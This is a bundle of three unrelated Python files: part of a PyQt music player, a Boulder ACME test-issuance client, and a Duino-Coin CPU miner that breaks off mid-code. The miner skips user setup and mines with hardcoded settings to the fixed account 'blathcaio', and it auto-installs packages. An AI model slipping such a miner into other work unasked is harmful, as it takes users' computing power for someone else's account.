layout.setGeometry(QtCore.QRect())
logger.debug('Cover art created')
h = QHBoxLayout()
cover_art = CoverArt()
size_policy = QSizePolicy()
size_policy.setHorizontalStretch(6)
cover_art.setSizePolicy(size_policy)
self.song_info = SongInfoBox()
icons = {}
song_list = SongList(player_, session_, settings_manager_, icons, cover_art)
size_policy = QSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Preferred)
size_policy.setHorizontalStretch(3)
size_policy.setVerticalStretch(10)
song_list.setMinimumWidth(350)
song_list.setSizePolicy(size_policy)
song_list.setIconSize(QSize(75, 75))
song_list.setResizeMode(song_list.Adjust)
song_list.setSpacing(3)
self.list = song_list
logger.debug('Songlist added. now adding songs.')
index = self.settings.value('index', 0)
db_queue = getattr(self.db, self.player.queues.get(self.player.queue_mode, 'history'))
if callable(db_queue):
db_queue()
setattr(self.session, 'icons', icons)
self.list.current_queue = self.settings.value('queue', GV.MainQueue)
logger.debug('Songs added')
self.list.load_current_queue()
player.update_queue(self.list.current_queue)
try:
item = self.list.item(index)
except IndexError:
pass
else:
if item is not None:
self.list.scrollToItem(item)
self.list.load_items_by_index(index)
self.list.change_selected(item)
logger.debug('Scrolled to index %s' % index)
if item.song.cover_art is not None:
cover_art.change_pixmap(item.song.cover_art)
self.media_controls.song_changed(item.song)
self.song_info.update_info(item.song)
self.player.skip_to(index, item)
cover_art.setBaseSize(400, 400)
cover_art.setMinimumSize(100, 100)
size_policy = QSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.MinimumExpanding)
size_policy.setHorizontalStretch(4)
cover_art.setSizePolicy(size_policy)
cover_art.setScaledContents(True)
self.cover_art = cover_art
self.song_box = QVBoxLayout()
self.song_box.addWidget(self.list)
self.song_box.addWidget(self.song_info)
h.addWidget(self.cover_art)
h.addLayout(self.song_box, 4)
layout.addLayout(h, 0, 0, 1, 4)
self.setLayout(layout)
logger.debug('Layout complete')
self.song_changed.connect(self.on_change)
@property
def settings(self):
return self.settings_manager.get_settings_instance()
def change_rating(self, score):
index = getattr(self.session, 'index', None)
if index is None:
return
item1 = self.player.current
item2 = self.list.item(index)
if item1 is not None and item1 is item2:
item1.song.rating = score
@staticmethod
def dl_img(url):
return requests.get(url).content
def on_change(self, song, in_list=False, index=0, force_repaint=True, add=False):
song.set_cover_art()
item = None
if in_list:
item = self.list.item(index)
if item is not None and item != 0:
encoding = sys.stdout.encoding or 'utf-8'
print(index, song.index, song.name.encode('utf-8').decode(encoding, errors='replace'))
self.list.change_selected(item)
item.setData(Qt.UserRole, song.duration_formatted)
item.setText('{}\r\n{}'.format(*song.get_name_and_author()))
setattr(self.session, 'index', index)
self.settings.setValue('index', index)
elif add:
item = self.list.add_list_item(song, is_selected=True)
self.media_controls.song_changed(song)
self.song_info.update_info(song)
logger.debug('changing cover_art in main window')
if song.cover_art is None:
logger.debug('cover_art is None')
img = song.info.get('thumbnail', None)
if img is None:
img = os.path.join(os.getcwd(), 'icons', 'download.png')
logger.debug('Changing cover_art to %s' % img)
self.cover_art.change_pixmap(img, force_repaint)
else:
logger.debug('Changing cover_art to %s' % img)
self.cover_art.change_pixmap_from_data(self.dl_img(img), force_repaint)
else:
img = song.cover_art
logger.debug('Changing cover_art to %s' % img)
self.cover_art.change_pixmap(img, force_repaint)
setattr(self.session, 'cover_art', img)
if item is not None:
logger.debug('Setting icon to %s' % img)
item.setIcon(QIcon(img))
logger.debug('icon set')
if force_repaint:
logger.debug('Updating window')
self.update()
# scrollToItem has to be called after self.update() or the program crashes
if self.settings.value('scroll_on_change', True) and item is not None:
self.list.scrollToItem(item)
logger.debug('Items added and cover art changed')
class ProxyStyle(QProxyStyle):
def __init__(self, *args):
super().__init__(*args)
def pixelMetric(self, metric, option=None, widget=None):
if metric == QStyle.PM_SmallIconSize:
return 25
else:
return super().pixelMetric(metric, option, widget)
class MainWindow(QMainWindow):
def __init__(self, settings_manager_, db_, player_, keybinds_, session_, *args):
super().__init__(*args)
self.db = db_
self.player = player_
self.kb = keybinds_
self.session = session_
self.settings_manager = settings_manager_
self.media_controls = MediaControls(self.player)
self.main_stack = QStackedWidget()
self.queue_widget = QueueWidget(settings_manager_, db_, player_, keybinds_, session_, self.media_controls)
self.queue_widget_index = self.main_stack.insertWidget(-1, self.queue_widget)
columns = [Column(key, getattr(DBSong, key), key, **GV.TableColumns[key])
for key in attribute_names(DBSong) if key in GV.TableColumns.keys()]
model = SQLAlchemyTableModel(db_, columns, self.db.items(DBSong))
self.table_view = SongTable(model)
self.table_view_index = self.main_stack.insertWidget(-1, self.table_view)
self.setCentralWidget(self.main_stack)
self.bottom_dock = QDockWidget(self)
self.bottom_dock.setTitleBarWidget(QWidget()) # Removes title bar
widget = QWidget()
widget.setLayout(self.media_controls)
h = self.media_controls.minimumSize().height()
self.bottom_dock.setMaximumHeight(h)
self.bottom_dock.setMinimumHeight(h)
self.bottom_dock.setWidget(widget)
self.bottom_dock.setAllowedAreas(Qt.BottomDockWidgetArea | Qt.TopDockWidgetArea)
self.bottom_dock.setFeatures(QDockWidget.DockWidgetMovable)
self.bottom_dock.show()
self.addDockWidget(Qt.BottomDockWidgetArea, self.bottom_dock)
menu = self.menuBar().addMenu(Icons.Menu, 'Preferences')
action = menu.addAction('test')
action.triggered.connect(self.change_stack)
self.restore_position_settings()
def change_stack(self, checked=False):
if self.main_stack.currentIndex() == self.table_view_index:
self.main_stack.setCurrentIndex(self.queue_widget_index)
else:
self.main_stack.setCurrentIndex(self.table_view_index)
@property
def settings(self):
return self.settings_manager.get_settings_instance()
# http://stackoverflow.com/a/8736705/6046713
def save_position_settings(self):
settings = self.settings_manager.get_unique_settings_inst()
settings.beginGroup('mainwindow')
settings.setValue('geometry', self.saveGeometry())
settings.setValue('savestate', self.saveState())
settings.setValue('maximized', self.isMaximized())
if not self.isMaximized():
settings.setValue('pos', self.pos())
settings.setValue('size', self.size())
settings.endGroup()
def restore_position_settings(self):
settings = self.settings_manager.get_unique_settings_inst()
settings.beginGroup('mainwindow')
self.restoreGeometry(settings.value('geometry', self.saveGeometry()))
self.restoreState(settings.value('savestate', self.saveState()))
self.move(settings.value('pos', self.pos()))
self.resize(settings.value('size', self.size()))
maximized = settings.value('maximized', self.isMaximized())
if maximized is True or maximized == 'true':
self.showMaximized()
settings.endGroup()
def closeEvent(self, event):
self.save_position_settings()
import logging
logger = logging.getLogger('debug')
logger.setLevel(logging.DEBUG)
handler = logging.FileHandler(filename='debug.log', encoding='utf-8', mode='w')
handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))
logger.addHandler(handler)
if __name__ == "__main__":
app = QApplication(sys.argv)
app.setApplicationName('Music player')
app.setOrganizationName('s0hvaperuna')
app.setStyle(ProxyStyle())
Icons.create_icons()
settings_manager = SettingsManager()
session = SessionManager()
metadata_updater = MetadataUpdater(session)
metadata_updater.start()
db = DBHandler('yttest', session)
player = GUIPlayer(None, None, None, session, GUIPlayer.SHUFFLED, db, 0.2, daemon=True)
keybinds = KeyBinds(global_binds=True)
main_window = MainWindow(settings_manager, db, player, keybinds, session)
def close_event(lock=None):
player.exit_player(lock)
main_window.close()
keybinds.add_keybind(KeyBind(ord('3'), player.play_next_song,
'Skip song', modifiers=(KeyCodes.id_from_key('ctrl'),)))
keybinds.add_keybind(KeyBind(KeyCodes.id_from_key('subtract'), player.change_volume,
'Volume down'))
keybinds.add_keybind(KeyBind(KeyCodes.id_from_key('add'), lambda: player.change_volume(True),
'Volume up'))
keybinds.add_keybind(KeyBind(KeyCodes.id_from_key('numpad 5'), close_event,
'Quit player', threaded=True,
modifiers=(KeyCodes.id_from_key('ctrl'),)))
player.start()
session.start()
app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
at_exit(run_funcs_on_exit, [(session.save_session, (), {}), (db.shutdown, (), {})])
main_window.show()
db.delete_history()
timer = QTimer()
# Message pump has to be on the same thread as Qt or keyboard presses might
# cause random crashes.
timer.timeout.connect(keybinds.pump_messages)
timer.setInterval(10)
timer.start()
app.exec_()
metadata_updater.stop()
player.exit_player()
keybinds.stop()
session.stop()
session.wait_for_stop(10)
# All of the preparations for shutting down must be completed before this command
# The last command is DBHandler.shutdown
run_on_exit(db.shutdown)
|
chisel.py
|
"""
A simple client that uses the Python ACME library to run a test issuance against
a local Boulder server. Usage:
$ virtualenv venv
$ . venv/bin/activate
$ pip install -r requirements.txt
$ python chisel.py foo.com bar.com
"""
import json
import logging
import os
import sys
import threading
import time
import urllib2
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import rsa
import OpenSSL
import josepy
from acme import challenges
from acme import client as acme_client
from acme import errors as acme_errors
from acme import messages
from acme import standalone
logger = logging.getLogger()
logging.basicConfig()
logger.setLevel(int(os.getenv('LOGLEVEL', 20)))
DIRECTORY = os.getenv('DIRECTORY', 'http://localhost:4000/directory')
# URLs to control dns-test-srv
SET_TXT = "http://localhost:8055/set-txt"
CLEAR_TXT = "http://localhost:8055/clear-txt"
os.environ.setdefault('REQUESTS_CA_BUNDLE', 'test/wfe-tls/minica.pem')
def make_client(email=None):
"""Build an acme.Client and register a new account with a random key."""
key = josepy.JWKRSA(key=rsa.generate_private_key(65537, 2048, default_backend()))
net = acme_client.ClientNetwork(key, user_agent="Boulder integration tester")
client = acme_client.Client(DIRECTORY, key=key, net=net)
account = client.register(messages.NewRegistration.from_data(email=email))
client.agree_to_tos(account)
client.account = account
return client
class NoClientError(ValueError):
"""
An error that occurs when no acme.Client is provided to a function that
requires one.
"""
pass
class EmailRequiredError(ValueError):
"""
An error that occurs when a None email is provided to update_email.
"""
def update_email(client, email):
"""
Use a provided acme.Client to update the client's account to the specified
email.
"""
if client is None:
raise NoClientError("update_email requires a valid acme.Client argument")
if email is None:
raise EmailRequiredError("update_email requires an email argument")
if not email.startswith("mailto:"):
email = "mailto:"+ email
acct = client.account
updatedAcct = acct.update(body=acct.body.update(contact=(email,)))
return client.update_registration(updatedAcct)
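# Illustrative usage sketch (not called anywhere in this file): how make_client
# and update_email fit together. The email addresses are made-up placeholders.
def _example_update_email():
    client = make_client(email="original@example.com")
    return update_email(client, "replacement@example.com")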
def get_chall(authz, typ):
for chall_body in authz.body.challenges:
if isinstance(chall_body.chall, typ):
return chall_body
raise Exception("No %s challenge found" % typ)
class ValidationError(Exception):
"""An error that occurs during challenge validation."""
def __init__(self, domain, problem_type, detail, *args, **kwargs):
self.domain = domain
self.problem_type = problem_type
self.detail = detail
def __str__(self):
return "%s: %s: %s" % (self.domain, self.problem_type, self.detail)
def issue(client, authzs, cert_output=None):
"""Given a list of authzs that are being processed by the server,
wait for them to be ready, then request issuance of a cert with a random
key for the given domains.
If cert_output is provided, write the cert as a PEM file to that path."""
domains = [authz.body.identifier.value for authz in authzs]
pkey = OpenSSL.crypto.PKey()
pkey.generate_key(OpenSSL.crypto.TYPE_RSA, 2048)
csr = OpenSSL.crypto.X509Req()
csr.add_extensions([
OpenSSL.crypto.X509Extension(
'subjectAltName',
critical=False,
value=', '.join('DNS:' + d for d in domains).encode()
),
])
csr.set_pubkey(pkey)
csr.set_version(2)
csr.sign(pkey, 'sha256')
cert_resource = None
try:
cert_resource, _ = client.poll_and_request_issuance(josepy.ComparableX509(csr), authzs)
except acme_errors.PollError as error:
# If we get a PollError, pick the first failed authz and turn it into a more
# useful ValidationError that contains details we can look for in tests.
for authz in error.updated:
updated_authz = json.loads(urllib2.urlopen(authz.uri).read())
            domain = authz.body.identifier.value
for c in updated_authz['challenges']:
if 'error' in c:
err = c['error']
raise ValidationError(domain, err['type'], err['detail'])
# If none of the authz's had an error, just re-raise.
raise
if cert_output is not None:
pem = OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM,
cert_resource.body)
with open(cert_output, 'w') as f:
f.write(pem)
return cert_resource
def http_01_answer(client, chall_body):
"""Return an HTTP01Resource to server in response to the given challenge."""
response, validation = chall_body.response_and_validation(client.key)
return standalone.HTTP01RequestHandler.HTTP01Resource(
chall=chall_body.chall, response=response,
validation=validation)
def do_dns_challenges(client, authzs):
cleanup_hosts = []
for a in authzs:
c = get_chall(a, challenges.DNS01)
name, value = (c.validation_domain_name(a.body.identifier.value),
c.validation(client.key))
cleanup_hosts.append(name)
urllib2.urlopen(SET_TXT,
data=json.dumps({
"host": name + ".",
"value": value,
})).read()
client.answer_challenge(c, c.response(client.key))
def cleanup():
for host in cleanup_hosts:
urllib2.urlopen(CLEAR_TXT,
data=json.dumps({
"host": host + ".",
})).read()
return cleanup
def do_http_challenges(client, authzs):
port = 5002
challs = [get_chall(a, challenges.HTTP01) for a in authzs]
answers = set([http_01_answer(client, c) for c in challs])
server = standalone.HTTP01Server(("", port), answers)
thread = threading.Thread(target=server.serve_forever)
thread.start()
# Loop until the HTTP01Server is ready.
while True:
try:
urllib2.urlopen("http://localhost:%d" % port)
break
except urllib2.URLError:
time.sleep(0.1)
for chall_body in challs:
client.answer_challenge(chall_body, chall_body.response(client.key))
def cleanup():
server.shutdown()
server.server_close()
thread.join()
return cleanup
def auth_and_issue(domains, chall_type="http-01", email=None, cert_output=None, client=None):
"""Make authzs for each of the given domains, set up a server to answer the
challenges in those authzs, tell the ACME server to validate the challenges,
then poll for the authzs to be ready and issue a cert."""
if client is None:
client = make_client(email)
authzs = [client.request_domain_challenges(d) for d in domains]
if chall_type == "http-01":
cleanup = do_http_challenges(client, authzs)
elif chall_type == "dns-01":
cleanup = do_dns_challenges(client, authzs)
else:
raise Exception("invalid challenge type %s" % chall_type)
try:
cert_resource = issue(client, authzs, cert_output)
client.fetch_chain(cert_resource)
return cert_resource, authzs
finally:
cleanup()
def expect_problem(problem_type, func):
"""Run a function. If it raises a ValidationError or messages.Error that
contains the given problem_type, return. If it raises no error or the wrong
error, raise an exception."""
ok = False
try:
func()
except ValidationError as e:
if e.problem_type == problem_type:
ok = True
else:
raise
except messages.Error as e:
if problem_type in e.__str__():
ok = True
else:
raise
if not ok:
raise Exception('Expected %s, got no error' % problem_type)
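# Illustrative usage sketch (not called anywhere in this file): expect_problem
# wraps a call that is expected to fail validation. The domain and the ACME
# problem type below are made-up example values.
def _example_expect_problem():
    expect_problem("urn:acme:error:unauthorized",
                   lambda: auth_and_issue(["expected-to-fail.example.com"],
                                          chall_type="dns-01"))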
if __name__ == "__main__":
domains = sys.argv[1:]
if len(domains) == 0:
print __doc__
sys.exit(0)
try:
auth_and_issue(domains)
except messages.Error, e:
print e
sys.exit(1)
|
Minhacarteira.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin Python PC Miner (v2.5.6)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
# Import libraries
import sys
from configparser import ConfigParser
from datetime import datetime
from hashlib import sha1
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import environ as osenviron
from platform import machine as osprocessor
from os import path, system
from os import system as ossystem
from pathlib import Path
from platform import system as plsystem
from re import sub
from signal import SIGINT, signal
from socket import socket
from statistics import mean
from subprocess import DEVNULL, Popen, check_call
from threading import Thread as thrThread
from time import ctime, sleep, strptime, time
from multiprocessing import Lock, current_process
from random import choice
import pip
import select
thread_lock = Lock()
def install(package):
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
execl(sys.executable, sys.executable, *sys.argv)
def now():
# Return datetime object
return datetime.now()
try:
# Check if cpuinfo is installed
import cpuinfo
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Cpuinfo is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"py-cpuinfo\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("py-cpuinfo")
try:
# Check if requests is installed
import requests
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Requests is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "requests" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('requests')
try:
# Check if colorama is installed
from colorama import Back, Fore, Style, init
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Colorama is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"colorama\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("colorama")
try:
# Check if pypresence is installed
from pypresence import Presence
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Pypresence is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"pypresence\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("pypresence")
try:
# Check if xxhash is installed
import xxhash
xxhash_enabled = True
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Xxhash is not installed - "
+ "Xxhash support will be disabled")
xxhash_enabled = False
# Global variables
MINER_VER = "2.56" # Version number
NODE_ADDRESS = "server.duinocoin.com"
AVAILABLE_PORTS = [
2813, # PC (1)
2814, # PC (2)
2815, # PC (3)
2812, # Wallets, other miners
2811 # Legacy
]
SOC_TIMEOUT = 45 # Socket timeout
PERIODIC_REPORT_TIME = 60
RESOURCES_DIR = "PCMiner_" + str(MINER_VER) + "_resources"
donatorrunning = False
debug = "n"
discord_presence = "y"
rig_identiier = "None"
requested_diff = "NET"
algorithm = "DUCO-S1"
config = ConfigParser()
donation_level = 0
thread = []
totalhashrate_mean = []
mining_start_time = time()
# Create resources folder if it doesn't exist
if not path.exists(RESOURCES_DIR):
mkdir(RESOURCES_DIR)
# Check if languages file exists
if not Path(RESOURCES_DIR + "/langs.json").is_file():
url = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
r = requests.get(url)
with open(RESOURCES_DIR + "/langs.json", "wb") as f:
f.write(r.content)
# Load language file
with open(RESOURCES_DIR + "/langs.json", "r", encoding="utf8") as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if plsystem() == "Darwin":
if getlocale()[0] is None:
setlocale(LC_ALL, "en_US.UTF-8")
# Check if miner is configured, if it isn't, autodetect language
try:
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("mt"):
lang = "maltese"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("pr"):
lang = "portugese"
elif locale.startswith("it"):
lang = "italian"
elif locale.startswith("zh"):
lang = "chinese_simplified"
elif locale.startswith("th"):
lang = "thai"
else:
lang = "english"
else:
# Read language variable from configfile
try:
config.read(RESOURCES_DIR + "/Miner_config.cfg")
lang = config["Duino-Coin-PC-Miner"]["language"]
except Exception:
# If it fails, fallback to english
lang = "english"
except:
lang = "english"
lang = "english"
def getString(string_name):
    # Get string from language file
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
def debug_output(text):
# Debug output
if debug == "y":
print(now().strftime(Style.DIM + "%H:%M:%S.%f ") + "DEBUG: " + text)
def title(title):
# disable window title setter when running with nohup
if osenviron.get('_') != '/usr/bin/nohup':
# Set window title
if osname == "nt":
# Windows systems
system("title " + title)
else:
# Most standard terminals
print("\33]0;" + title + "\a", end="")
sys.stdout.flush()
def handler(signal_received, frame):
# SIGINT handler
if current_process().name == "MainProcess":
pretty_print(
"sys0",
getString("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ getString("goodbye"),
"warning")
try:
# Close previous socket connection (if any)
socket.close()
except Exception:
pass
_exit(0)
def calculate_uptime(start_time):
    uptime = time() - start_time
    if uptime >= 7200:
        return str(round(uptime // 3600)) + " hours"
    elif uptime >= 3600:
        return str(round(uptime // 3600)) + " hour"
    elif uptime >= 120:
        return str(round(uptime // 60)) + " minutes"
    elif uptime >= 60:
        return str(round(uptime // 60)) + " minute"
    else:
        return str(round(uptime)) + " seconds"
def get_prefix(diff: int):
if diff >= 1000000000:
diff = str(round(diff / 1000000000)) + "G"
elif diff >= 1000000:
diff = str(round(diff / 1000000)) + "M"
elif diff >= 1000:
diff = str(round(diff / 1000)) + "k"
return str(diff)
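# Illustrative sketch (not called anywhere): get_prefix shortens large
# difficulty values for display; the numbers below are arbitrary examples.
def _example_get_prefix():
    assert get_prefix(750) == "750"
    assert get_prefix(2813) == "3k"
    assert get_prefix(1500000) == "2M"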
# Enable signal handler
signal(SIGINT, handler)
def Greeting():
# Greeting message
global greeting
print(Style.RESET_ALL)
if requested_diff == "LOW":
diffName = getString("low_diff_short")
elif requested_diff == "MEDIUM":
diffName = getString("medium_diff_short")
else:
diffName = getString("net_diff_short")
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = getString("greeting_morning")
elif current_hour == 12:
greeting = getString("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = getString("greeting_afternoon")
elif current_hour >= 18:
greeting = getString("greeting_evening")
else:
greeting = getString("greeting_back")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Fore.YELLOW
+ Style.BRIGHT
+ getString("banner")
+ Style.RESET_ALL
+ Fore.MAGENTA
+ " (v"
+ str(MINER_VER)
+ ") "
+ Fore.RESET
+ "2019-2021")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.YELLOW
+ "https://github.com/revoxhere/duino-coin")
if lang != "english":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ lang.capitalize()
+ " translation: "
+ Fore.YELLOW
+ getString("translation_autor"))
try:
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ "CPU: "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(threadcount)
+ "x "
+ str(cpu["brand_raw"]))
except Exception as e:
debug_output("Error displaying CPU message: " + str(e))
if osname == "nt" or osname == "posix":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("donation_level")
+ Style.BRIGHT
+ Fore.YELLOW
+ str(donation_level))
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("algorithm")
+ Style.BRIGHT
+ Fore.YELLOW
+ algorithm
+ " ⚙ "
+ diffName)
if rig_identiier != "None":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("rig_identifier")
+ Style.BRIGHT
+ Fore.YELLOW
+ rig_identiier)
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ str(greeting)
+ ", "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(username)
+ "!\n")
def loadConfig():
# Config loading section
global username
global efficiency
global donation_level
global debug
global threadcount
global requested_diff
global rig_identiier
global lang
global algorithm
global SOC_TIMEOUT
global discord_presence
global PERIODIC_REPORT_TIME
# Initial configuration
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
print(
Style.BRIGHT
+ getString("basic_config_tool")
+ RESOURCES_DIR
+ getString("edit_config_file_warning"))
print(
Style.RESET_ALL
+ getString("dont_have_account")
+ Fore.YELLOW
+ getString("wallet")
+ Fore.RESET
+ getString("register_warning"))
username = "blathcaio"
if xxhash_enabled:
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "1"
+ Style.NORMAL
+ " - DUCO-S1 ("
+ getString("recommended")
+ ")")
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "2"
+ Style.NORMAL
+ " - XXHASH")
algorithm = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_algorithm")
+ Fore.RESET
+ Style.BRIGHT)
else:
algorithm = "1"
efficiency = "95"
threadcount = "8"
requested_diff = "2"
rig_identiier = "Hello12h3"
donation_level = "0"
        # Check whether efficiency is correct
efficiency = sub(r"\D", "", efficiency)
if efficiency == "":
efficiency = 95
elif float(efficiency) > int(100):
efficiency = 100
elif float(efficiency) < int(1):
efficiency = 1
        # Check whether threadcount is correct
threadcount = sub(r"\D", "", threadcount)
if threadcount == "":
threadcount = cpu_count()
elif int(threadcount) > int(8):
threadcount = 8
print(
Style.RESET_ALL
+ Style.BRIGHT
+ getString("max_threads_notice"))
elif int(threadcount) < int(1):
threadcount = 1
        # Check whether algo setting is correct
if algorithm == "2":
algorithm = "XXHASH"
else:
algorithm = "DUCO-S1"
        # Check whether diff setting is correct
if requested_diff == "1":
requested_diff = "LOW"
elif requested_diff == "2":
requested_diff = "MEDIUM"
else:
requested_diff = "MEDIUM"
        # Check whether donation_level is correct
donation_level = sub(r"\D", "", donation_level)
if donation_level == "":
donation_level = 1
elif float(donation_level) > int(5):
donation_level = 5
elif float(donation_level) < int(0):
donation_level = 0
# Format data
config["Duino-Coin-PC-Miner"] = {
"username": username,
"efficiency": efficiency,
"threads": threadcount,
"requested_diff": requested_diff,
"donate": donation_level,
"identifier": rig_identiier,
"algorithm": algorithm,
"language": lang,
"debug": "n",
"soc_timeout": 45,
"periodic_report": 60,
"discord_presence": "y"
}
with open(RESOURCES_DIR + "/Miner_config.cfg", "w") as configfile:
config.write(configfile)
print(Style.RESET_ALL + getString("config_saved"))
else:
# If config already exists, load data from it
config.read(RESOURCES_DIR + "/Miner_config.cfg")
username = config["Duino-Coin-PC-Miner"]["username"]
efficiency = config["Duino-Coin-PC-Miner"]["efficiency"]
threadcount = config["Duino-Coin-PC-Miner"]["threads"]
requested_diff = config["Duino-Coin-PC-Miner"]["requested_diff"]
donation_level = config["Duino-Coin-PC-Miner"]["donate"]
algorithm = config["Duino-Coin-PC-Miner"]["algorithm"]
rig_identiier = config["Duino-Coin-PC-Miner"]["identifier"]
debug = config["Duino-Coin-PC-Miner"]["debug"]
SOC_TIMEOUT = int(config["Duino-Coin-PC-Miner"]["soc_timeout"])
discord_presence = config["Duino-Coin-PC-Miner"]["discord_presence"]
PERIODIC_REPORT_TIME = int(
config["Duino-Coin-PC-Miner"]["periodic_report"])
efficiency = (100 - float(efficiency)) * 0.01
def ducos1(
lastBlockHash,
expectedHash,
difficulty,
efficiency):
# DUCO-S1 algorithm
# Measure starting time
timeStart = time()
base_hash = sha1(str(lastBlockHash).encode('ascii'))
temp_hash = None
    # Loop from 0 to 100*diff
for ducos1res in range(100 * int(difficulty) + 1):
# If efficiency lower than 100% sleep to use less CPU
if ducos1res % 1000000 == 0 and float(100 - efficiency * 100) < 100:
sleep(float(efficiency))
# Generate hash
temp_hash = base_hash.copy()
temp_hash.update(str(ducos1res).encode('ascii'))
ducos1 = temp_hash.hexdigest()
# Check if result was found
if ducos1 == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1res / timeDelta
return [ducos1res, hashrate]
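# Illustrative sketch (not called anywhere): a DUCO-S1 round trip. The expected
# hash for a known nonce is built the same way the algorithm does (SHA1 of the
# last block hash concatenated with the nonce), then ducos1 is asked to find
# that nonce again. The block hash and nonce are arbitrary example values.
def _example_ducos1_roundtrip():
    last_block = "a" * 40
    nonce = 1234
    expected = sha1((last_block + str(nonce)).encode("ascii")).hexdigest()
    result, hashrate = ducos1(last_block, expected, difficulty=100, efficiency=0)
    assert result == nonce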
def ducos1xxh(
lastBlockHash,
expectedHash,
difficulty,
efficiency):
# XXHASH algorithm
# Measure starting time
timeStart = time()
    # Loop from 0 to 100*diff
for ducos1xxres in range(100 * int(difficulty) + 1):
# If efficiency lower than 100% sleep to use less CPU
if ducos1xxres % 1000000 == 0 and float(100 - efficiency * 100) < 100:
sleep(float(efficiency))
# Generate hash
ducos1xx = xxhash.xxh64(
str(lastBlockHash) + str(ducos1xxres), seed=2811)
ducos1xx = ducos1xx.hexdigest()
# Check if result was found
if ducos1xx == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1xxres / timeDelta
return [ducos1xxres, hashrate]
def Thread(
threadid: int,
accepted: int,
rejected: int,
requested_diff: str,
khashcount: int,
username: str,
efficiency: int,
rig_identiier: str,
algorithm: str,
hashrates_list,
totalhashrate_mean,
NODE_ADDRESS: str,
NODE_PORT: int):
# Mining section for every thread
start_time = time()
report_shares = 0
while True:
while True:
try:
retry_counter = 0
while True:
try:
if retry_counter >= 3:
debug_output(
'Error connecting after 3 retries, '
+ 'fetching new node IP')
NODE_ADDRESS, NODE_PORT = fetch_pools()
debug_output('Connecting to node ' +
str(NODE_ADDRESS) + ":" + str(NODE_PORT))
soc = socket()
soc.connect((str(NODE_ADDRESS), int(NODE_PORT)))
soc.settimeout(SOC_TIMEOUT)
server_version = soc.recv(100).decode()
if server_version:
break
except Exception as e:
retry_counter += 1
pretty_print("net0",
" Error connecting to mining node: "
+ str(e)
+ ", retrying in 5s",
"error")
sleep(5)
if threadid == 0:
soc.send(bytes("MOTD", encoding="utf8"))
motd = soc.recv(1024).decode().rstrip("\n")
if "\n" in motd:
motd = motd.replace("\n", "\n\t\t")
pretty_print("net" + str(threadid),
" MOTD: "
+ Fore.RESET
+ Style.NORMAL
+ str(motd),
"success")
if threadid == 0:
if float(server_version) <= float(MINER_VER):
# Miner is up-to-date
pretty_print(
"net"
+ str(threadid),
getString("connected")
+ Fore.RESET
+ Style.NORMAL
+ getString("connected_server")
+ str(server_version)
+ ", node: "
+ str(NODE_ADDRESS)
+ ":"
+ str(NODE_PORT)
+ ")",
"success")
else:
# Miner is outdated
pretty_print(
